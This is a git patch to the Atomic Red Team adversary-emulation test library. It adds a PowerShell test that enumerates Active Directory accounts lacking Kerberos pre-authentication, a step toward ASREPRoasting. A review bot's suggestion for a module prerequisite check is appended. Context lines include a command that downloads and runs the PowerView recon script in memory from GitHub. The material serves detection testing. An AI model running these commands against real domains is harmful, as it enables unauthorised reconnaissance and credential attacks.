From ded0f5bc5360ac2ac70de44fa1dc1ce5c85cb0fd Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 25 Jun 2020 20:36:36 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 14 ++++++++++ atomics/T1069.002/T1069.002.md | 27 +++++++++++++++++++ atomics/T1069.002/T1069.002.yaml | 1 + atomics/used_guids.txt | 1 + 8 files changed, 47 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 37da24fb..1f39e3a9 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -426,6 +426,7 @@ discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group ( discovery,T1069.002,Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell +discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell 
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e950e61f..f378db34 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -260,6 +260,7 @@ discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group ( discovery,T1069.002,Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell +discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index da4f2b1f..6680fa95 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -826,6 +826,7 @@ - Atomic Test #4: Find machines where user has local admin access (PowerView) [windows] - Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows] - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows] + - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows] - [T1482 Domain Trust Discovery](../../T1482/T1482.md) - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows] - Atomic Test #2: Windows - Discover domain trusts with nltest [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index bde7b583..210cb204 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -536,6 +536,7 @@ - Atomic Test #4: Find machines where user has local admin access (PowerView) [windows] - Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows] - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows] + - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows] - [T1482 Domain Trust Discovery](../../T1482/T1482.md) - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows] - Atomic Test #2: Windows - Discover domain trusts with nltest [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f9e291fe..aebb6460 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -35455,6 +35455,20 @@ discovery: command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose' name: powershell + - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast) + auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b + description: | + When successful, accounts that do not require kerberos pre-auth will be returned + Requires the Active Directory module for powershell to be installed + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth + -eq $TRUE} + +' T1482: technique: id: attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0 diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index adbb6d6d..51805ac3 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -18,6 +18,8 @@ Commands such as net group /domain of the [Net](https://attack.mitr - [Atomic Test #6 - Find Local Admins via Group Policy (PowerView)](#atomic-test-6---find-local-admins-via-group-policy-powerview) +- [Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast)](#atomic-test-7---enumerate-users-not-requiring-pre-auth-asreproast) +
@@ -180,4 +182,29 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29 +
+
+ +## Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast) +When successful, accounts that do not require kerberos pre-auth will be returned +Requires the Active Directory module for powershell to be installed + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} +``` + + + + + +
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml index ac73862b..1e5db992 100644 --- a/atomics/T1069.002/T1069.002.yaml +++ b/atomics/T1069.002/T1069.002.yaml @@ -79,6 +79,7 @@ atomic_tests: command: "IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" name: powershell - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast) + auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b description: | When successful, accounts that do not require kerberos pre-auth will be returned Requires the Active Directory module for powershell to be installed diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 492443e9..ead9488b 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -531,3 +531,4 @@ ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b 161dcd85-d014-4f5e-900c-d3eaae82a0f7 648d68c1-8bcd-4486-9abe-71c6655b6a2c 784e4011-bd1a-4ecd-a63a-8feb278512e6 +870ba71e-6858-4f6d-895c-bb6237f6121b
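Review bot: The ActiveDirectory module requirement for test #7 is stated only in the `description` text kept as context in the T1069.002.yaml hunk, so on a host without the module the run presumably fails with a command-not-found error instead of being reported as a missing prerequisite. The rest of the entry lies outside this hunk, but the generated index.yaml copy on this page shows `executor` directly after `supported_platforms`, with no `dependencies` key. I would add a `dependencies` entry whose `prereq_command` checks for the module, as sketched below. The description could also say what a non-empty result means for defenders: each returned account has Kerberos pre-authentication disabled and should either have the flag cleared or be covered by monitoring. Since the query selects accounts by a Kerberos attribute rather than by group membership, filing it under T1069.002 (Domain Groups) may be worth revisiting.

```yaml
# … unchanged: name, auto_generated_guid, description, supported_platforms …
  dependency_executor_name: powershell
  dependencies:
  - description: |
      The ActiveDirectory PowerShell module must be available on the host
    prereq_command: |
      if (Get-Module -ListAvailable -Name ActiveDirectory) { exit 0 } else { exit 1 }
    get_prereq_command: |
      Write-Host "Install the RSAT Active Directory PowerShell module, then re-run the prerequisite check"
# … unchanged: executor (name, elevation_required, command) …
```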